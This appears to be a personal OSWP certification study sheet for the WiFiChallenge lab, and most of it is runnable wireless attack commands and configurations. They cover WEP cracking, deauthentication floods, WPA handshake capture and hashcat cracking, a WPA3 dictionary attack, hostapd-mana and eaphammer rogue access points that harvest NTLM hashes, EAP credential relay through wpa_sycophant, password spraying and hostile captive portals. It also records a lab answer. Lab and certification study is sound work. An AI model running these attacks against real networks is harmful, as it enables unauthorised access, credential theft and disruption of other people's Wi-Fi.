Info

Exam

https://lab.wifichallenge.com/

Resource

https://www.offsec.com/courses/pen-210/
https://lab.wifichallenge.com/
https://pierrelouis.blog/posts/oswp-lab-setup/
https://zeyadazima.com/certificates/oswprg/
https://youtu.be/Ra0dGPYScLQ?si=KMNJr7d0PbI08b8Y

Setting

https://github.com/r4ulcl/WiFiChallengeLab-docker

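# Bring up the WiFiChallenge lab containers.
# Chained with && so that a failed clone (or a missing directory) does not run
# `docker compose up` against whatever directory the shell happens to be in.
git clone https://github.com/r4ulcl/WiFiChallengeLab-docker \
  && cd WiFiChallengeLab-docker \
  && docker compose --file docker-compose.yml up -d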

Basic

Enum Info

# Check which wireless drivers/chipsets airmon-ng recognises
sudo airmon-ng

# List USB devices with full descriptors (vendor/product id of the adapter)
sudo lsusb -vv

# Driver details: module dependencies, supported hardware and the firmware it needs
# (ath9k_htc is the example driver used here; substitute your own)
sudo modinfo ath9k_htc

# Loaded modules and which other modules depend on each of them
lsmod

# Unload modules — list the dependent modules first, then the module they depend on
sudo rmmod <module_name1> <module_name2>

Brute Force

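# Build the lab wordlist: prefix every rockyou candidate with "wifi-".
# Uses $0 rather than $1 — "$1" silently truncates any candidate containing a space
# at the first blank, so those passwords could never be matched.
# prefix_wordlist PREFIX SRC DST — fails (and writes nothing) when SRC is unreadable.
prefix_wordlist() {
  local prefix=${1:?prefix} src=${2:?source wordlist} dst=${3:?output file}
  if [[ ! -r "$src" ]]; then
    printf 'prefix_wordlist: cannot read %s\n' "$src" >&2
    return 1
  fi
  awk -v p="$prefix" '{ print p $0 }' "$src" > "$dst"
}
prefix_wordlist 'wifi-' ~/rockyou-top100000.txt ~/wifi-rockyou.txt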


mac change

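# Spoof the MAC address of wlan2. The interface must be down while the address changes.
# The systemd unit is NetworkManager (the name used in the WPA section below); the old
# network-manager alias is not present on every distro, so stop NetworkManager explicitly
# so it does not keep managing the interface while we change it.
sudo systemctl stop NetworkManager
sudo ip link set wlan2 down
sudo macchanger -m b0:72:bf:44:b0:49 wlan2
sudo ip link set wlan2 up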

Wireless Tools

iw util

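# Show the channels/frequencies the adapter supports (iwlist is legacy; `iw list` is authoritative)
sudo iwlist wlan0 frequency

# Full capability dump: bands, channels, supported interface modes (monitor/AP), HT/VHT
sudo iw list

# Set the channel of the monitor interface (nl80211 replacement for `iwconfig wlan0mon channel 11`)
sudo iw dev wlan0mon set channel 11

# List the SSIDs in range
sudo iw dev wlan0 scan | grep SSID

# List SSIDs together with their channel by parsing the scan output
sudo iw dev wlan0 scan | grep -E "DS Parameter set|SSID:"

# Create a monitor-mode virtual interface (VIF) wlan0mon, bring it up, and delete it again
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up
sudo iw dev wlan0mon interface del

# Raw frame dump from the monitor interface
sudo tcpdump -i wlan0mon

# Show the regulatory domain; "country 00" is the unset/world default
sudo iw reg get

# Change the regulatory domain (needs root). Persistent setting: REGDOMAIN=US in /etc/default/crda
# on distros that still ship crda; newer kernels load the regulatory db themselves and may not
# read that file — confirm on your system.
sudo iw reg set <COUNTRY>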

rfkill

rfkill은 연결된 무선 기기를 활성화 또는 비활성화하는 도구

# Show every Wi-Fi and Bluetooth radio and its soft/hard block state
sudo rfkill list

# Disable (block) and re-enable (unblock) radios — all at once, or one by the id shown in `rfkill list`
sudo rfkill block all
sudo rfkill block <block_id>
sudo rfkill unblock <block_id>

air

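# Put the adapter into monitor mode; airmon-ng renames the interface (wlan0 -> wlan0mon)
sudo airmon-ng
sudo airmon-ng start wlan0

# Channel scan
#   -c11     : lock to channel 11. Channel lock and --band hopping overlap — the MGT section
#              notes to drop --band abg when capturing; pick one of the two.
#   -w       : prefix of the output files (~/wifi/scan-01.cap, .csv, ...)
#   --bssid  : restrict to one AP — replace the 00:00:00:00:00:00 placeholder
sudo airodump-ng wlan0mon -w ~/wifi/scan --manufacturer --wps --band abg -c11 --bssid 00:00:00:00:00:00

# Replay attacks; the -<n> flag selects the attack:
#   -1 3600 -q 10 : fake authentication with the AP, re-auth every 3600 s, keep-alive every 10 s (WEP)
#   -3            : ARP request replay to generate IVs (WEP); -b AP BSSID, -h our source MAC
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:AA:19:29 wlan0mon
sudo aireplay-ng -3 -b F0:9F:C2:AA:19:29 -h BA:49:A9:53:A1:8C wlan0mon

# Crack: run airodump-ng, aireplay-ng and aircrack-ng concurrently and let aircrack-ng retry
# as IVs accumulate in the capture (no wordlist needed for WEP)
sudo aircrack-ng wifi-old-01.cap

# Decrypt a PSK capture with the recovered passphrase.
# Keep "$PASSWORD" quoted; note that a secret passed on argv is visible in `ps` and shell
# history, so set the variable in the environment rather than typing the passphrase inline.
airdecap-ng -e wifi-mobile -p "$PASSWORD" ~/wifi/scanc6-02.cap
wireshark ~/wifi/scanc6-02-dec.cap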

mdk

# Recover a hidden SSID by probing the AP (-t AP BSSID) with each candidate from the wordlist
mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f ~/wifi-rockyou.txt

WPA

# https://android.googlesource.com/platform/external/wpa_supplicant_8/+/master-soong/wpa_supplicant/wpa_supplicant.conf
# Open network (no authentication). $ESSID / $PASSWORD in these snippets are placeholders
# to substitute by hand: wpa_supplicant does not expand shell variables in its config file.
network={
	ssid="$ESSID"
	key_mgmt=NONE
	scan_ssid=1
}

# WEP credentials (key_mgmt=NONE plus a static key; quote the key for ASCII, leave it unquoted for hex)
network={
  ssid="wifi-old"
  key_mgmt=NONE
  wep_key0=$PASSWORD
  wep_tx_keyidx=0
}

# WPA2-PSK credentials
network={
    ssid="wifi-mobile"
    psk="$PASSWORD"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}

# SAE
network={
    # Connect via WPA3 to a WPA2+WPA3 network (SAE needs PMF: ieee80211w=1 optional, 2 required)
    ssid="my_network"
    psk="password"
    key_mgmt=SAE
    ieee80211w=1
}

# MGT, EAP-PEAP — from the comments this is the relay (wpa_sycophant) profile: identity and
# password stay empty because the victim's inner exchange is forwarded; presumably
# crypto_binding=0 keeps the relayed inner auth from being tied to this TLS tunnel — verify.
network={
  ssid="wifi-regional-tablets"
  ## The SSID you would like to relay and authenticate against. 
  scan_ssid=1
  key_mgmt=WPA-EAP
  ## Do not modify
  identity=""
  anonymous_identity=""
  password=""
  ## This initialises the variables for me.
  ## -------------
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  ## Dont want to connect back to ourselves,
  ## so add your rogue BSSID here.
  ## (recent wpa_supplicant releases call this bssid_ignore and keep bssid_blacklist as an alias — check your version)
  bssid_blacklist=F0:9F:C2:00:00:00
}

# Plain PEAP/MSCHAPv2 client profile. No ca_cert / domain_match is set, so the supplicant
# accepts any RADIUS server certificate — exactly the weakness the rogue-AP and relay attacks
# in the MGT section exploit. The credentials are stored in clear text: chmod 600 this file.
network={ 
	ssid="NetworkName" 
	scan_ssid=1 
	key_mgmt=WPA-EAP 
	identity="Domain\\username" 
	password="password" 
	eap=PEAP 
	phase1="peaplabel=0" 
	phase2="auth=MSCHAPV2" 
}

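# wpa_supplicant and NetworkManager fight over the same interface: stop NetworkManager first.
# `disable` is persistent across reboots — re-enable it when finished
# (sudo systemctl enable --now NetworkManager).
sudo systemctl stop NetworkManager
sudo systemctl disable NetworkManager

# Join the network described in free.conf, get a DHCP lease and enumerate hosts on the link.
# wpa_supplicant stays in the foreground here, so run the next commands from a second shell
# (or add -B to daemonise it).
sudo wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
sudo dhclient -v wlan2
sudo arp-scan -I wlan2 -l

# Release the DHCP lease
sudo dhclient -r wlan2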

SAE WPA3

## SAE
# Online dictionary attack against WPA3-SAE: one commit/confirm exchange per candidate (slow and noisy)
cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462

# Downgrade: in the beacon, Wireless Management -> RSN Information -> Management Frame Protection.
# Only when both "Required" and "Capable" are False are unprotected deauth frames honoured;
# with PMF required (WPA3-only) this deauth is ignored by the client.
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52

WEP Crack

# Automatic WEP attack: besside-ng associates, replays and cracks on its own
# (-c channel, -b target BSSID, -v verbose)
besside-ng -c 1 -b F0:9F:C2:AA:19:29 wlan2 -v

# Manual: see the aircrack section above

PSK

# Recovering the PSK: deauth a client (10 deauth bursts here) -> capture the 4-way handshake
# with airodump-ng -> aircrack-ng with a wordlist on the capture
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon

Fake AP

# hostapd.conf for hostapd-mana: a rogue WPA2-PSK AP that records each connecting client's
# handshake (mana_wpaout) in hashcat format. wpa_passphrase does not need to match the real
# network — the client's MIC is computed from its own PSK, and that is what gets cracked.
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=wifi-offices
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

hostapd-mana hostapd.conf

# If the original hostapd.hccapx is text: strip the "[WPA2-EAPOL HASHCAT]" tag from each line.
# NB: -m 2500 (hccapx) is deprecated in hashcat 6.x — either run it with
# --deprecated-check-disable or convert the capture to the 22000 format; confirm on your version.
sed 's/^\[WPA2-EAPOL HASHCAT\][[:space:]]*//' hostapd.hccapx > clean_hashes.txt
hashcat -a 0 -m 2500 clean_hashes.txt ~/rockyou-top100000.txt

MGT

relay할때, 취약한 클라이언트를 인증해제 한 뒤 해당 자격증명으로 온갖 AP에 Relay 접속 시도 해보기

# When capturing for wifi_db, leave out --band abg (see airodump-ng in the air section).
# Import the airodump-ng captures into a SQLite DB and browse it.
# (/root/tools here vs ~/tools elsewhere in this file — the same path when running as root.)
cd /root/tools/wifi_db
python3 wifi_db.py -d wifichallenge.SQLITE ~/wifi/
sqlitebrowser wifichallenge.SQLITE

# Print the certificates presented by APs using MGT (802.1X) found in the capture
cd /root/tools/
bash pcapFilter.sh -f ~/wifi/scanc44-02.cap -C

# Identify which EAP methods the AP accepts for a given identity
cd /root/tools/EAP_buster/
bash ./EAP_buster.sh wifi-global 'GLOBAL\GlobalAdmin' wlan1

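# Rogue EAP AP and NTLM-hash capture
## Generate the server certificate the rogue RADIUS presents; clients whose profile has no
## ca_cert/domain_match (like the PEAP profile in the WPA section) accept it
cd /root/tools/eaphammer
python3 ./eaphammer --cert-wizard
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced

## Deauth the clients of the legitimate APs so they roam to the rogue AP
## (-0 0 = endless deauth, stop with Ctrl-C; -c = target client)
iw dev wlan0mon set channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon -c 64:32:A8:07:6C:40
airmon-ng start wlan1
iw dev wlan1mon set channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan1mon -c 64:32:A8:07:6C:40

## Crack the captured hashes (-m 5500 = NetNTLMv1) / lab answer: bulldogs1234
## grep reads the log directly (no cat); the file is deduplicated afterwards so re-running
## the capture does not pile up identical hashes. --force silences hashcat's driver/env warnings —
## drop it if hashcat runs cleanly without it.
grep hashcat logs/hostapd-eaphammer.log | awk '{print $3}' >> hashcat.5500
sort -u -o hashcat.5500 hashcat.5500
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou-top100000.txt --force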

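# Rogue AP relay (credentials relayed through wpa_sycophant)
## Give the rogue AP radio the MAC that the sycophant supplicant profile blacklists
## (bssid_blacklist=F0:9F:C2:00:00:00 in the WPA section), so the relay never connects back to itself
airmon-ng stop wlan1mon
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up

## Shell 1: rogue EAP AP (positional args: AP radio wlan1, upstream lo, ESSID); captured creds go to outputMana.log
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo wifi-regional-tablets

## Shell 2: deauth the victim client so it reconnects to the rogue AP
airmon-ng start wlan0
iw dev wlan0mon set channel 44
aireplay-ng -0 0 wlan0mon -a F0:9F:C2:7A:33:28 -c 64:32:A8:A9:DE:55

## Shell 3: relay the victim's inner exchange to the real AP from a third radio
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3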

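# Online brute force of one user's password (air-hammer drives the EAP exchange)
cd  ~/tools/air-hammer
# printf rather than echo: under sh/xpg_echo, echo would turn "\t" into a tab and corrupt the name
printf '%s\n' 'CONTOSO\test' > test.user
./air-hammer.py -i wlan3 -e wifi-corp -p ~/rockyou-top100000.txt -u test.user

# Password spraying: one known password against a list of domain users (mind account lockout).
# awk reads the list directly; $1 intentionally drops any trailing whitespace on a username line.
awk '{print "CONTOSO\\" $1}' ~/top-usernames-shortlist.txt > ~/top-usernames-shortlist-contoso.txt
./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u ~/top-usernames-shortlist-contoso.txt

# Rogue open AP with a captive portal / hostile portal (Responder-style credential capture)
./eaphammer --essid WiFi-Restaurant --interface wlan4 --captive-portal
./eaphammer --essid WiFi-Restaurant --interface wlan2 --hostile-portal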

WireShark

Local Capture

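# Put the adapter into monitor mode by hand. Unlike airmon-ng this keeps the name wlan0 —
# no wlan0mon exists after these lines, so the commands below use wlan0.
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Channel hop: sweep the 2.4 GHz channels (1/6/11 first, the common ones), one second each
for channel in 1 6 11 2 7 10 3 8 4 9 5; do
  sudo iw dev wlan0 set channel "${channel}"
  sleep 1
done
## Channel hop alternative: airodump-ng hops by itself
sudo airodump-ng wlan0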

# List all capture interfaces
sudo wireshark -D

# Start capturing immediately (-k) on <interface> in monitor mode (-I), with a capture filter (-f)
# and a snapshot length (-s). -f takes BPF capture-filter syntax, not display-filter syntax.
sudo wireshark -i <interface> -k -I -f "<filter>" -s <byte length>

# Open a saved capture
wireshark file.pcap

Remote Capture

# Pipe a live tcpdump capture (-U unbuffered, -w - to stdout) into Wireshark. As written this is a
# local pipe; for a truly remote capture run the tcpdump half over ssh and pipe it the same way.
sudo tcpdump -U -w - -i wlan0mon | wireshark -k -i -

Filter

# Wireshark display filters. wlan.fc.type: 0 = management, 1 = control, 2 = data, 3 = extension
wlan.fc.type==2
!(wlan.fc.type == 1)

# BPF *capture* filter (tcpdump / `wireshark -f` syntax — not valid as a display filter):
# frames to/from one device, minus beacons, control frames and probe requests/responses,
# which leaves association (request/response) and data frames
((wlan addr1 3A:30:F9:0F:E1:95) or (wlan addr2 3A:30:F9:0F:E1:95) or (wlan addr3 3A:30:F9:0F:E1:95) or (wlan addr4 3A:30:F9:0F:E1:95)) and not (subtype beacon) and not (type ctl) and not (subtype probe-req) and not (subtype probe-resp)

wifi_db

# Import airodump-ng captures into a SQLite DB and browse it (same commands as in the MGT section)
cd /root/tools/wifi_db
python3 wifi_db.py -d wifichallenge.SQLITE ~/wifi/
sqlitebrowser wifichallenge.SQLITE